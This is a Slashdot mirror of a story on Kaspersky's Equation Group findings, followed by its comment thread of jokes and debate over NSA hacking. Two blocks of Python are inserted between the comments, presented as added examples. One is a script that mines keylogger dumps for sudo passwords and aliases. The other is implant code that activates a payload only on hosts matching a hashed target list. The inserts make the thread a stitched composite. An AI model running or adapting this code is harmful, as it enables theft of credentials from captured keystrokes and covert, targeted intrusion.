Slashdot Mirror


How "Omnipotent" Hackers Tied To NSA Hid For 14 Years and Were Found At Last

Advocatus Diaboli writes The money and time required to develop the Equation Group malware, the technological breakthroughs the operation accomplished, and the interdictions performed against targets leave little doubt that the operation was sponsored by a nation-state with nearly unlimited resources to dedicate to the project. The countries that were and weren't targeted, the ties to Stuxnet and Flame, and the Grok artifact found inside the Equation Group keylogger strongly support the theory that the NSA or a related US agency is the responsible party, but so far Kaspersky has declined to name a culprit. NSA officials didn't respond to an e-mail seeking comment for this story. What is safe to say is that the unearthing of the Equation Group is a seminal finding in the fields of computer and national security, as important as, or possibly more important than, the revelations about Stuxnet.

115 comments

  1. Us vs them by halivar · · Score: 5, Funny

    We hack Iran to prevent them from releasing a bomb.

    NK hacks us to prevent us from also releasing a bomb, IYKWIMAITYD.

    1. Re:Us vs them by Anonymous Coward · · Score: 0

      The Interview is the funniest movie I've ever seen.

    2. Re:Us vs them by Anonymous Coward · · Score: 2, Funny

      Is it also the first movie you've ever seen ?

    3. Re:Us vs them by halivar · · Score: 2

      No, he's also seen Gigli, Ishtar, and Domino.

    4. Re:Us vs them by MightyMartian · · Score: 4, Funny

      Let's face it. If you're a Michael Bay fan, The Interview probably would come off as high art.

      --
      The world's burning. Moped Jesus spotted on I50. Details at 11.
    5. Re:Us vs them by Anonymous Coward · · Score: 0

      Are you always this pompous?

    6. Re:Us vs them by MightyMartian · · Score: 3, Funny

      I didn't mean to upset the Michael Bay fans. I know how they all think Pearl Harbor is the highest achievement in cinema history, apart from Transformers: Revenge of the Fallen.

      --
      The world's burning. Moped Jesus spotted on I50. Details at 11.
    7. Re:Us vs them by Anonymous Coward · · Score: 0

      Let's face it. If you're a Michael Bay fan, The Interview probably would come off as high art.

      Michael Bay doesn't do comedies.

      At least not intentionally.

      The typical Michael Bay fan looks for explosions, car chases, and hot chicks in tight clothes. I really doubt that The Interview had enough of any of those to appeal to them.

    8. Re:Us vs them by CauseBy · · Score: 1

      I watched it. I thought it was above average for a gross slapstick comedy.

    9. Re:Us vs them by Anonymous Coward · · Score: 0

      By "pompous," do you mean "I like Michael Bay movies and if this guy's not pompous then I am kinda stupid, therefore he's pompous"?

    10. Re:Us vs them by bytesex · · Score: 1

      And Highlander 2.

      / No! No! There *is* no Highlander 2!

      --
      Religion is what happens when nature strikes and groupthink goes wrong.
    11. Re:Us vs them by sbrown123 · · Score: 1

      The Interview is the funniest movie I've ever seen.

      I'm so sorry for you.

    12. Re:Us vs them by RavenLrD20k · · Score: 1

      Dude! How did you get away with leaving a blank post?

    13. Re: Us vs them by Anonymous Coward · · Score: 0

      They all hack the banks to pay for it.

  2. Re:Not surprising to anyone by Anonymous Coward · · Score: 0

    True dat. They hate us for our freedom, not because we're using drones to blow up their elementary schools.

  3. Re:Not surprising to anyone by ganjadude · · Score: 0

    they hate us cause they aint us

    --
    have you seen my sig? there are many others like it but none that are the same
  4. Re:Not surprising to anyone by mujadaddy · · Score: 1

    They anus?

    --
    Populus vult decipi, ergo decipiatur...
    "Force shits upon Reason's back." - Poor Richard's Almanac
  5. Cover locations. by Kaenneth · · Score: 5, Interesting

    There is a building near Microsoft labeled "Affiliated Associations of America" which sounds shady as fuck.

    1. Re:Cover locations. by Anonymous Coward · · Score: 1

      There is a building near Microsoft labeled "Affiliated Associations of America" which sounds shady as fuck.

      Yeah, they do employee health benefits, which means, honestly, they make the NSA look like the Young Pioneers.

    2. Re:Cover locations. by irrational_design · · Score: 4, Interesting

      Wow, I found an Affiliated Associations of America. If the following isn't the biggest piece of business jargon that doesn't say anything, I don't know what is.

      Welcome to the AAOA benefits website. Through a cooperative platform, we developed a benefit program to enhance the value of membership for your Membership Organization or Association. AAOA provides a turnkey member benefit solution that offers companies and their employees an opportunity to reduce the costs of doing business. Take advantage of our group purchasing power and receive full access to exclusive member discounts and pricing. Look around the site and let us know if you have any questions or would like to discuss membership. With AAOA, membership doesn't cost, it pays!

    3. Re:Cover locations. by Anonymous Coward · · Score: 1

      And if you work with SQL, you can work in that building!

      http://www.glassdoor.com/Job/Affiliated-Associations-of-America-Kirkland-Jobs-EI_IE478643.0,34_IL.35,43_IC1150472.htm

      Apply now!

    4. Re:Cover locations. by Anonymous Coward · · Score: 0

      And Microsoft isn't?

    5. Re:Cover locations. by Anonymous Coward · · Score: 1

      It's just super meta. It sounds like they're a group that helps people start associations, and then connects them to each other, associating their associations and maybe letting them group-purchase tools to manage their memberships or something?

    6. Re:Cover locations. by St.Creed · · Score: 3, Insightful

      It's probably more a service for running associations.

      Suppose you're a grocery and you would like to implement a membership card. Now you have to deal with lost cards, signups, people wanting to know how many loyalty points they have, decide how many points to give for which purchase, what to give as a reward for points spent, etc. etc.

      This type of company takes it all out of your hands, provides a pre-packaged membership club with set rewards, tiers, perks, whatever, and puts your brandname on top of the website, the loyalty card, and the brochures. The grocery probably pays a price per customer that's lower than when they would run it themselves, and the affiliate organisation has scale, so can run things cheaper while providing better service than a single company can do.

      --
      Therefore, by the (faulty) logic you're using, you're just a cow with a keyboard - osu-neko (2604)
    7. Re:Cover locations. by Anonymous Coward · · Score: 0

      The keyword is in the name: Affiliated. It's a marketing company. Affiliate marketing is big business. How do you think they can offer their "services" without being paid by their customer associations? The same way it always works: If you're not paying, you're not the customer.

    8. Re:Cover locations. by ixidor · · Score: 1

      Here in Charlotte, the large collection of buildings in the same plaza as Microsoft is the CIA building, but with no external markings as such.

    9. Re:Cover locations. by Neo-Rio-101 · · Score: 3, Funny

      The syndicated accumulated affiliated aggregated associated conglomerated corporated assembly union group organization society company of the United States of America

      *Pause for fanfare*

      --
      READY.
      PRINT ""+-0
    10. Re:Cover locations. by Anonymous Coward · · Score: 0

      The accumulated affiliated aggregated associated assembly conglomerated corporated group organization society syndicated union COMPANY of the United States of America

    11. Re:Cover locations. by meta-monkey · · Score: 2

      Also, the 8 story, black glass building with the barbed wire fences and security guards labeled "Flower Shop."

      --
      We don't have a state-run media we have a media-run state.
    12. Re:Cover locations. by Anonymous Coward · · Score: 0

      In Atlanta, next door to a very large AT&T building, are the unmarked offices of the CIA and NSA.

  6. interesting infection rate graphic by Anonymous Coward · · Score: 1

    Mainly for which countries are not listed. Hmmm.

  7. Re:Not surprising to anyone by halivar · · Score: 1

    Often, I'm told.

  8. "Found" by TheCastro1689 · · Score: 1

    So a smart country would "target" itself since it received all the info anyway. This means that these findings aren't really there; just guesses.

    1. Re:"Found" by bluefoxlucid · · Score: 0

      The whole thing is just hype. Enormous time and money? Deployment aside, I could DEVELOP something like this BY MYSELF. Virtual file systems? I wrote one on Fuse on a whim, to intercept disk access calls and check against policy. Exploiting a kernel driver? Same as exploiting anything else; it's a zero-day malware. Hundreds of CNC servers? Vanilla botnet--a deployment issue. Detecting iPhones and doing weird shit? Yeah, I work in DevOps; I have a server that detects mobile phones and redirects them to a mobile site.

      Software of a given size doesn't require special time or money; it requires skill. Creating a full MacOSX clone with a BSD-like kernel and DPDF windowing system? That requires a ton of time and expert skill effort, because it's millions of lines of complex code. Creating a Windows 7 clone? Same. Creating a Linux clone from scratch? Same. Creating a WinAMP clone? Much less time and effort. Creating a FileZilla clone? Similar to a WinAMP clone. Creating a computer worm? It's a few thousand lines of code; it's single-person basement work for anyone familiar with the various techniques involved.

      All of these technological breakthroughs were old in 1999.

    2. Re:"Found" by Anonymous Coward · · Score: 0

      The difference between your claims and what was done is pretty significant.

      Sure, everything stated in the article can be done with folks who have the programming chops pretty easily. Where it becomes difficult is doing it all Ninja style. This isn't some hacked together code. This is very polished stuff with some serious thought put into keeping it secret.

      Anyone can build a soap-box racer. Only a few can make a Ferrari.

    3. Re:"Found" by ColdWetDog · · Score: 1

      You are under arrest. Please keep your hands off the keyboard. Do not move quickly.

      We will be at your door presently.

      Sincerely,

      Your Government

      --
      Faster! Faster! Faster would be better!
    4. Re:"Found" by rtb61 · · Score: 1

      However, government agencies using inside knowledge of source code to create these attack tools and then being stupid enough to use them, ie release them into the wild where organised crime can get hold of them, is not so new. In fact it is a totally and utterly mind-bogglingly stupid thing to do; how fucking myopically short-sighted can those fuckwits be? Governments need to bloody wake up to what is going on and create a huge level of separation between attack and defence elements of cyber security. In fact the defence elements of cyber security should actively seek to prosecute the morons on the offence side when they stupidly release destructive code into the wild which goes on to attack what everyone else in the country is trying to protect. Some of those idiots need some rest time behind bars; some levels of stupidity should be punished, OK, rehabilitated in correctional facilities.

      --
      Chaos - everything, everywhere, everywhen
    5. Re:"Found" by raind · · Score: 1

      They are hiring in the desert, probably could use someone like you.

      --
      Get up!
  9. Thinking of keyloggers, by invictusvoyd · · Score: 2

    Stephen Hawking's computer cannot be infected by a keylogger.

    1. Re:Thinking of keyloggers, by Anonymous Coward · · Score: 0

      It can, but the log would look like this:
      TAB TAB TAB TAB TAB TAB TAB TAB ENTER

    2. Re:Thinking of keyloggers, by rrohbeck · · Score: 1

      Running Linux and tightening up your browser should be good enough.

    3. Re:Thinking of keyloggers, by Qzukk · · Score: 3, Interesting

      Now I wonder if tabs work in passwords on *nix, if I set my username to be pwd and my password to be cd ../../<TAB><TAB>f<TAB> how would anyone figure that out from a keylog dump?

      --
      If I have been able to see further than others, it is because I bought a pair of binoculars.
    4. Re:Thinking of keyloggers, by Anonymous Coward · · Score: 0

      Not downloading random files from the Internet is good enough.

    5. Re:Thinking of keyloggers, by rrohbeck · · Score: 1

      There are drive-by downloads from ad networks which you'll catch with a standard setup.

    6. Re:Thinking of keyloggers, by Anonymous Coward · · Score: 0

      By looking for the word "sudo .....": after the carriage return will be your password. A simple grep of the log will reveal all the previous times you've typed this, and "pwd" will come before it quite a bit.

      Maybe you could alias "sudo", but a quick search for "-i. bash, yum" with a command in front would reveal your likely alias...
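
The two posts above (Qzukk's tab-in-the-password idea and the reply showing how a grep for "sudo" undermines it) describe an analysis that can be shown concretely. The script below is an added example written for this page, not the Equation Group keylogger or anything from the Kaspersky report; its log token format, the sample keystrokes and the alias "pls" are all constructed for illustration.

```python
"""
Mining a raw keystroke log for a password by context: an added example for
this thread, not the Equation Group keylogger's format or any code from the
report. The token format, the sample keystrokes and the alias "pls" are
constructed for illustration.
"""
from collections import Counter

# Keys as the assumed logger writes them: printable characters as themselves,
# specials as <SP>, <TAB>, <BS> (backspace) and <ENTER>, whitespace-separated.
SPECIAL = {"<SP>": " ", "<TAB>": "\t"}

# Arguments that almost only ever follow sudo (or an alias for it).
ADMIN_ARGS = {"-i", "-s", "bash", "sh", "yum", "apt", "apt-get"}

# Constructed sample: the user aliased sudo to "pls" and, as suggested above,
# uses "cd ../../<TAB><TAB>f<TAB>" as a password.
SAMPLE_KEYLOG = """
l s <SP> - l <ENTER>
s u d o <SP> y u m <SP> u p d a t e <ENTER>
c d <SP> . . / . . / <TAB> <TAB> f <TAB> <ENTER>
c a t <SP> n o t e s . t x t <ENTER>
p l s <SP> b a s h <ENTER>
c d <SP> . . / . . / <TAB> <TAB> f <TAB> <ENTER>
c d <SP> / t m p <TAB> <ENTER>
"""


def reconstruct_lines(log_text):
    """Replay key tokens into the lines the user submitted with ENTER.
    <TAB> stays a literal tab: the logger sees keystrokes, never what the
    shell completed them to, and a password prompt completes nothing."""
    lines, buf = [], []
    for tok in log_text.split():
        if tok == "<ENTER>":
            lines.append("".join(buf))
            buf = []
        elif tok == "<BS>":
            if buf:
                buf.pop()
        else:
            buf.append(SPECIAL.get(tok, tok))
    if buf:
        lines.append("".join(buf))
    return lines


def guess_sudo_aliases(lines):
    """A first word that is not 'sudo' but is followed by a typical sudo
    argument (bash, -i, yum, ...) is probably an alias for it."""
    aliases = set()
    for line in lines:
        words = line.split()
        if len(words) >= 2 and words[0] != "sudo" and words[1] in ADMIN_ARGS:
            aliases.add(words[0])
    return aliases


def password_candidates(lines, triggers=("sudo",)):
    """The line entered right after a privilege-escalation command is, nearly
    always, the answer to its password prompt. Returns (trigger, candidate)."""
    found = []
    for i in range(len(lines) - 1):
        words = lines[i].split()
        if words and words[0] in triggers:
            found.append((lines[i], lines[i + 1]))
    return found


def recover(log_text):
    """Full pass: rebuild lines, widen the trigger set with discovered
    aliases, and rank candidates by how often they recur after a trigger."""
    lines = reconstruct_lines(log_text)
    aliases = guess_sudo_aliases(lines)
    candidates = password_candidates(lines, {"sudo"} | aliases)
    ranked = Counter(pw for _, pw in candidates).most_common()
    return {
        "aliases": sorted(aliases),
        "candidates": candidates,
        "most_likely": ranked[0][0] if ranked else None,
    }


if __name__ == "__main__":
    result = recover(SAMPLE_KEYLOG)
    print("probable sudo aliases:", result["aliases"])
    for trigger, pw in result["candidates"]:
        print(f"after {trigger!r}: {pw!r}")
    print("most likely password:", repr(result["most_likely"]))
```

Run on the sample it reports "pls" as a probable sudo alias and the same candidate, the literal keystrokes cd ../../<TAB><TAB>f<TAB>, after both escalation commands. The reply's point holds in general: a keylogger records keys, not what the shell made of them, and a password prompt performs no completion, so the recorded sequence is the password, tabs included; recurrence right after known escalation commands is what picks it out of the surrounding noise.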

  10. It's all bogus by Anonymous Coward · · Score: 1

    There's no such thing as "omnipotent" hackers, it's all a bunch of *#*$&@%$@!$#@!#{}@{}#@}#${[[

    NO CARRIER


    Would you like to play a game?

  11. Interesting they talk about airgaps by Anonymous Coward · · Score: 0

    Remember that hubbub about airgap-crossing viruses about 6 months ago? That suddenly got very quiet.

  12. How is this a good thing? by stevedog · · Score: 4, Insightful

    I'm not sure how I see that this is a good thing. I know it's fun to hate on the intelligence community (I've done it too), especially when we feel like our own rights have been infringed, but are we really saying that we are in favor of anything which hampers the West's ability to take clandestine actions against other states? After all the complaining we do about Congress and all the bureaucracy that comes along with anything usually related to government, we are then saying that absolutely every hostile action should be subject to the same oversight that produces exactly that molasses-like barrier to actual results?

    It is without question that, at times, the intelligence community must have overstepped its bounds, as any entity with that much power would on occasion. Maybe in their case that happens far more often than it should. But does that really mean they should have no real power at all?

    1. Re:How is this a good thing? by Kazoo+the+Clown · · Score: 4, Insightful

      So everyone should just leave their doors wide open so the cops never have to break a door down to nab a crook? Yeah, right. If the NSA can hack into our computers, the bad guys can too. The best way to improve cybersecurity is to fix all the exploitable holes they've been using. But instead of helping us to secure our systems they've left them vulnerable because they're too lazy to pound the pavement, get individual warrants and plant bugs. Having every computer system in the world remain vulnerable made their job easier, so they chose that route, which also made the bad guys efforts easier too. But hey, it's job security, eh?

    2. Re:How is this a good thing? by Anonymous Coward · · Score: 2, Insightful

      How do you know they don't have a warrant? It seems like using md5 and sha1 hashes to ensure they are only targeting specific individuals smells like somebody with very specific instructions and stiff repercussions. Otherwise it would be easier to grab a pile of people and sort them out later.
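
The post above points at a concrete mechanism: gating a payload on hashes of victim identifiers so that it only runs on pre-selected machines. The code below is an added illustration of that pattern, written for this page rather than taken from the Kaspersky report, which says nothing about which identifiers were hashed or how they were normalised; the identifier formats, hostnames, user names and candidate list are all constructed.

```python
"""
Gating a payload on hashed victim identifiers: an added illustration for this
thread, not code from the Kaspersky report or any real implant. Identifier
formats, hostnames and user names below are constructed.
"""
import hashlib


def fingerprint(identifier):
    """Normalise an identifier and hash it both ways. The implant carries only
    these digest pairs; the plaintext identifier never leaves the operator."""
    norm = identifier.strip().lower().encode("utf-8")
    return (hashlib.md5(norm).hexdigest(), hashlib.sha1(norm).hexdigest())


def build_target_list(identifiers):
    """Operator side: turn the chosen victims into the digest set that ships."""
    return frozenset(fingerprint(i) for i in identifiers)


def host_identifiers(hostname, username, domain):
    """Implant side: the identifiers a host can offer for comparison. Which
    attributes are used is an assumption of this example."""
    return [hostname, domain, f"{username}@{domain}", f"{domain}\\{username}"]


def should_activate(target_list, observed_identifiers):
    """True only when some observed identifier hashes into the target list.
    Both digests must match, so an MD5 collision alone does not fire it."""
    return any(fingerprint(i) in target_list for i in observed_identifiers)


def identify_targets(target_list, candidate_identifiers):
    """Analyst side: with the digest list recovered from a sample and a list
    of plausible identifiers (DNS zone, directory export), recover the targets."""
    return {c for c in candidate_identifiers if fingerprint(c) in target_list}


# Constructed operator input: two victims, one by host name, one by account.
TARGET_LIST = build_target_list(["ws-0412.research.example", "j.doe@research.example"])

# Constructed analyst input: names harvested from the victim organisation.
CANDIDATES = [
    "ws-0411.research.example", "ws-0412.research.example",
    "printer.research.example", "a.smith@research.example",
    "j.doe@research.example",
]

if __name__ == "__main__":
    hosts = [
        ("WS-0412.Research.Example", "a.smith", "research.example"),  # by hostname
        ("lab-07.other.example", "j.doe", "research.example"),         # by account
        ("pc1.home.example", "bob", "home.example"),                   # not a target
    ]
    for host in hosts:
        print(host[0], "->", should_activate(TARGET_LIST, host_identifiers(*host)))
    print("targets recovered from digest list:",
          sorted(identify_targets(TARGET_LIST, CANDIDATES)))
```

The operator half (build_target_list) is included only so the example runs stand-alone; a deployed implant would carry TARGET_LIST and nothing else. The caveat for anyone analysing such a list: unsalted MD5/SHA-1 over low-entropy identifiers such as hostnames and account names is cheap to test against a candidate list, which is exactly what identify_targets does, so a recovered digest list does leak the targets to anyone able to enumerate plausible names.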

    3. Re:How is this a good thing? by stevedog · · Score: 2

      No, quite the opposite. At the same time, though, what would happen if every soldier's gun had a chip that required "command approval" before any member of a squad could start firing? Sure, individual soldiers kill the wrong people, and for the wrong reasons, all the time. Hopefully, though, most of the time it is for the right reasons. And regardless, to place such restrictions on them limits their ability to safely carry out their intended purpose to such a degree that it is a problem.

      The idea is that, if they *do* overstep their boundaries, then that should be handled appropriately (and that is a valid point of criticism with more domestic recent events). But to claim that the intelligence community, whose job is to move about undetected, should be telling people, "you know, these floors make it easy for someone to sneak in undetected. You should replace them with these other floors, where no one would be able to sneak in at all," would be exactly the opposite of their intended job.

      They are the intelligence community, not our national cybersecurity consulting firm, and they only ought to be notifying the public if the risk to national security involved in leaving the vulnerability open is greater than the risk to national security involved in losing the intelligence that could be gained from it.

    4. Re:How is this a good thing? by Kazoo+the+Clown · · Score: 3, Interesting

      They are the intelligence community, not our national cybersecurity consulting firm, and they only ought to be notifying the public if the risk to national security involved in leaving the vulnerability open is greater than the risk to national security involved in losing the intelligence that could be gained from it.

      What you're saying is we HAVE NO national cybersecurity entity whose purpose is to protect our infrastructure from bad actors using exactly the kinds of methods and exploits we're seeing here. And given that, we have to rely on Kaspersky to do it for us. Not only is it then a good thing, it's long overdue.

    5. Re:How is this a good thing? by nbauman · · Score: 5, Insightful

      I think the intelligence community has done more harm than good more often than not.

      I think American foreign policy has done more harm than good to America more often than not.

      For example, look at the Iraq war. We destabilized that entire region of the Middle East, and left it wide open for ISIS and other militant groups.

      We supported the other "color" revolutions which also deposed effective dictators who were finally out of power after we supported them for so long. In every case the hippie revolutionaries were quickly brushed aside and replaced by really tough guys.

      Same with Assad in Syria. When he loses control of a region, ISIS moves in. You notice that the U.S. has stopped calling for Assad to leave.

    6. Re:How is this a good thing? by Anonymous Coward · · Score: 1

      ... losing the intelligence that could be gained ...

      Essentially an argument that back-doors do more good than harm: 'Cold fjord', is that you?

      Like a politician, you're saying your policy solves the problems we cause. What about the harm caused by a back-door? You haven't answered the basic question about back-doors: Can China use all those back-doors too? Because back-doors are good, then China gaining intelligence must be good too. By the way, your answer doesn't count, only China's.

      Most intelligence is about intellectual property. That is, the stuff that causes all that industrial espionage. So China and Russia won't steal the plans for new warships, the recipe for coca-cola is far more powerful. The NSA is lucky that piece of intelligence stays on dead-tree storage.

    7. Re:How is this a good thing? by kylemonger · · Score: 2

      It's a good thing because I appreciate knowing what kind of country I really live in. For most of my life I thought I lived in a country that wouldn't torture people. Later I learned that the CIA not only tortures people, they ship people to other countries so they can be tortured harder. That's one of many examples of the things they don't teach you in school that should nonetheless influence how you think and vote. I want to know the ugly truth about what's going on. It probably won't make me happy, but it might just keep me free.

    8. Re:How is this a good thing? by stevedog · · Score: 2

      I wasn't arguing that everyone should be happy about this. I would imagine that, if China found out about something like this, they would be quite upset. Similarly to how upset they would be when they found a spy in their government. That doesn't mean that our intelligence community shouldn't be trying to do exactly that and, presumably, vice versa (and, I would imagine, each is both trying and succeeding).

      To address your other point: I think that, if there is evidence that industrial espionage against the US has been facilitated by NSA backdoors, then the backdoors pose a greater risk than benefit to national security (assuming that the loss from such espionage is, again, greater than intelligence gained). This is all risk/benefit -- that's their job. I would be totally fine with Coke losing their formula to China if that means that they are also able to interdict intelligence that prevents a major attack on U.S. (or foreign, if sufficiently significant) soil.

      But, to be clear, you are right that part of this equation was the assumption that the U.S. was far superior to all other states in their ability to detect and utilize such backdoors. This has become far less true in recent years, and these policies by their risky nature do require careful constant re-evaluation. Furthermore, there is also something to be said for the inability to "revert" the changes in many of these backdoors, such as in hardware -- so if you later decide that these pose more risk to industry than benefit to national security, you're just SOL on existing backdoors. That makes it crucial that the element of longitudinal uncertainty be taken into account in the initial decision-making; hopefully it is, but admittedly foresight is often not government's strong suit...

    9. Re:How is this a good thing? by stevedog · · Score: 1

      I think you make an argument worth making, but your argument is about the application of tools, not the tools themselves. If the military and/or intelligence communities are being told to achieve objectives (or are even internally setting objectives) that do more harm than good, then they should be redirected. Even so, just like the military shouldn't lose their guns or cops shouldn't lose the ability to arrest people if they are arresting the wrong people, the intelligence community should not lose the tools that allow them to operate.

      To argue that any element of the government is operating suboptimally is often not a difficult argument to make. To say that they (any element of government) should be eliminated or neutered altogether is something else entirely, and I feel like that should be approached with great caution.

    10. Re:How is this a good thing? by turbidostato · · Score: 1

      "what would happen if every soldier's gun had a chip that required "command approval" before any member of a squad could start firing? Sure, individual soldiers kill the wrong people, and for the wrong reasons, all the time. Hopefully, though, most of the time it is for the right reasons. "

      What would happen if every computerized autonomous weapon system had a chip that required "command approval" before firing?

      There's no such chip on soldiers' weapons for a twofold reason:
      * There's not enough man/computer power to deal with the vast amount of information processing required.
      * In case of a delay or misunderstanding the good guys die.

      That's not the case here: the analysis power is there and nothing of value is lost in case of a minor delay. I don't want the "hopefully, though, most of the time it is for the right reasons" here: it is not only a too low ethical ground but it's not needed either.

    11. Re:How is this a good thing? by DNS-and-BIND · · Score: 1

      Confirmation bias. When intelligence succeeds, you never hear about it. ULTRA, probably the most successful intelligence operation ever, was kept secret for decades. Nobody knew what it was or how it had helped.

      You need to watch it talking about the color revolutions that way. Sounds like dog whistle racism to me. Just because Obama did it doesn't mean it was wrong. Nobody could have predicted this outcome.

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
    12. Re:How is this a good thing? by nbauman · · Score: 0

      The term "color revolution" has nothing to do with race. It refers to movements like the Orange Revolution in the Ukraine, the Rose Revolution in Georgia, the Purple Revolution in Iraq, the Cedar Revolution in Lebanon (not a color but it fits in the category), and the other revolutions of the Arab Spring.

      What they have in common is that most of them, like the Orange Revolution, got money, strategic advice, and other support from the U.S., through the International Republican Institute and the National Democratic Institute. The U.S. gave support to the parties that they favored in elections, in ways that would be illegal if foreigners did it in U.S. elections. And the idealistic revolutionaries were swept away by armed gangs.

      ULTRA ran during WWII. The issues and ethics of that war were relatively clear, and it was reasonable for people to put aside any reservations about the uncomfortable things the British, Americans and Soviets did and work together on the common goal.

      Nowadays, we don't have any great common goals and the wars and undercover activities are usually promoted by war hawks with their own agendas, usually without the kind of consensus and approval I think is necessary in a democracy. Why did the U.S. overthrow Aristide? Why did we invade Iraq?

      During a war like WWII, that threatens our existence, we have to put up with secrecy and limits to our freedom and democracy. We don't have a war like WWII, so those compromises aren't justified. The only wars we have are the ones that the intelligence services themselves created. So now, these politically neutral technical innovations are doing more harm than good.

    13. Re:How is this a good thing? by Anonymous Coward · · Score: 0

      But does that really mean they should have no real power at all?

      If you can't control your actions and can't obey the laws you are supposed to be protecting then NO!!!

    14. Re:How is this a good thing? by Anonymous Coward · · Score: 0

      Schneier has an insightful blog post on this question; in part: "Today's top-secret programs become tomorrow's PhD theses and the next day's hacker tools." Today, the Equation Group is "probably the most sophisticated computer attack group in the world," but these techniques aren't magically exclusive to the NSA.
      Kaspersky published details at https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

  13. The headline and the text say different things by Geoffrey.landis · · Score: 2

    The headline says different things than the text and the original article.

    The headline says that they "were found"... but they weren't.

    The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

    --
    http://www.geoffreylandis.com
    1. Re:The headline and the text say different things by Anonymous Coward · · Score: 0

      Welcome to headlines 101, using whatever works to make you click and then hoping you'll stick around a little.

    2. Re:The headline and the text say different things by grcumb · · Score: 2

      The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

      In fairness, by 'stopped short' they mean that the Kaspersky guys essentially said, 'We're not saying it's the NSA - we just can't imagine anyone else on the face of the earth who has the resources necessary to do this kind of thing.' So yes, the report was released with a nod in the direction of the NSA.

      --
      Crumb's Corollary: Never bring a knife to a bun fight.
    3. Re:The headline and the text say different things by blueg3 · · Score: 1

      The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

      That's a clever turn of phrase. Kaspersky pointedly calls them out as NSA, but doesn't explicitly say "this is a group at NSA".

    4. Re:The headline and the text say different things by geekmux · · Score: 1

      The headline says different things than the text and the original article.

      The headline says that they "were found"... but they weren't.

      The headline that they are "tied to NSA"... but TFA says that "researchers stopped short of saying Equation Group was the handiwork of the NSA."

      Tell me something, when you find a hack of this magnitude, how quickly are you going to be willing to jump up and down screaming "they did it! they did it!"?

      "stopped short" is politically correct speak for we-know-who-not-to-fuck-with.

  14. Oh, by the way by Anonymous Coward · · Score: 1

    I'm just going to mention that all these hacks are aimed at Windows machines. When you have a monoculture, you get the Irish potato famine.

    1. Re:Oh, by the way by Anonymous Coward · · Score: 2, Informative

      RTFA. They point out that they don't have an example of actual Mac infections (they only have two for Windows over the last 15 years), but that they get regular communication from infected machines identifying as Mac OS. Kaspersky makes it clear that they believe Macs are also compromised as a result. Nothing is mentioned about Linux, but I'd be surprised if they don't have access there as well.

    2. Re:Oh, by the way by Anonymous Coward · · Score: 0

      If they can find ways to run malware solely through the Windows registry, and actually rewrite hard drive firmware, I'm sure they have ways to exploit Linux boxes.

      Let's be honest, with the amount of funding they have I'd be shocked if they couldn't.

  15. The NSA hides surveillance software in hard drives by Advocatus+Diaboli · · Score: 5, Informative

    Ya.. another related post from engadget (http://www.engadget.com/2015/02/16/hard-drive-spyware/). "It's been known for a while that the NSA will intercept and bug equipment to spy on its soon-to-be owners, but the intelligence agency's techniques are apparently more clever than first thought. Security researchers at Kaspersky Lab have discovered apparently state-created spyware buried in the firmware of hard drives from big names like Seagate, Toshiba and Western Digital. When present, the code lets snoops collect data and map networks that would otherwise be inaccessible -- all they need to retrieve info is for an unwitting user to insert infected storage (such as a CD or USB drive) into an internet-connected PC. The malware also isn't sitting in regular storage, so you can't easily get rid of it or even detect it."

  16. Re:He might be referring to this by Johnny+Loves+Linux · · Score: 1

    This is the video that might explain the attitude: it's Spielberg vs. Hitchcock in an epic rap battle: https://www.youtube.com/watch?... Whatever your opinion of the directors, you might find the video hilarious!

  17. IYKWIMAITYD by Anonymous Coward · · Score: 2, Funny

    I had never seen this acronym before but when I saw it I automatically read it as If You Know What I Mean And I Think You Do. I am shutting down my computer now and taking a break from this internet thing.

1. Re:IYKWIMAITYD by Anubis IV · · Score: 1

      Never seen it before either, and that's exactly how I read it too. Scary that he was right about knowing what you meant.

  18. Is the US gov't by jodido · · Score: 1

    going to cut the US off from the Internet for a day (like they did to N. Korea) as punishment for all this?

    1. Re:Is the US gov't by Tablizer · · Score: 1

      going to cut the US off from the Internet for a day (like they did to N. Korea) as punishment for all this [revelation]?

      Yes, they'll make us all use Comcast. Explains the merger.

  19. I can haz party? by Anonymous Coward · · Score: 0

    Now that these "Omnipotent" hackers have been caught will there be a pool party on the roof?

  20. How is this a good thing? by Anonymous Coward · · Score: 0

It's like an arms race: the US was obviously winning for a while, but the Chinese, Russians and North Koreans realized they were being hacked and therefore had to build a suitable counter competency, which also included the ability to hack US agencies. I think what we are seeing now is more emphasis from other nations being put on cyber "terrorism" (was the US terrorizing these nations?), and ultimately more global balance.

  21. cyber bogeymen by Anonymous Coward · · Score: 0

Kaspersky is having a field day with carefully pointing but not naming them. How many press releases and we still don't have all the info?

  22. Thank you by ArchieBunker · · Score: 1

    Read the headline which sounded interesting but the summary sounded like a completely different story.

    --
    Only the State obtains its revenue by coercion. - Murray Rothbard
  23. Re:The NSA hides surveillance software in hard dri by Anonymous Coward · · Score: 1

What's scary is they aren't just hiding in the hard drives. They are actually rewriting the firmware of those drives, and carving out invisible partitions that can't get formatted.

24. Kaspersky again.... by chasm22 · · Score: 0

Just the other day they 'broke' the story about the big bank heist---and declined to identify the banks.

    Now they have broken the story about the mother of all hacker groups. And guess what. They decline to identify them. We found 'em. But we're not telling you who.

    Is this part in the linked article hilarious? "Using a C&C center, The Equation group comprises of over 300 domains and more than 100 servers hosted in countries including the US, UK, Panama and Colombia." Panama and Colombia? Yeah, hotbeds of foreign intrigue. Ha, ha. I think if I had found the servers set up in Panama and Colombia, it wouldn't be the NSA I'd be looking at. Let's see, what are their leading exports again? No, instead I think Kaspersky is pulling some of this crap out of the proverbial crap hole. Sorry though. I can't specifically say it's Kaspersky. But hey, everything seems to be pointing in one direction/or another, right?

    Oh, and then there is this. "Disclaimer: Kaspersky Labs sponsored the trip to the Security Analyst Summit 2015."

    I used to like Kaspersky. But with names like GReAT (Global Research and Analysis Team) and research like this, I'm having serious doubts about where the PR ends and reality sets in. I guess if you want to believe what they're trying to sell, Kaspersky is the greatest ever.

1. Re:Kaspersky again.... by Anonymous Coward · · Score: 0

      Good save, Agent Dooley. I think they bought it.

25. Revised - headline and the text say different things by Geoffrey.landis · · Score: 1

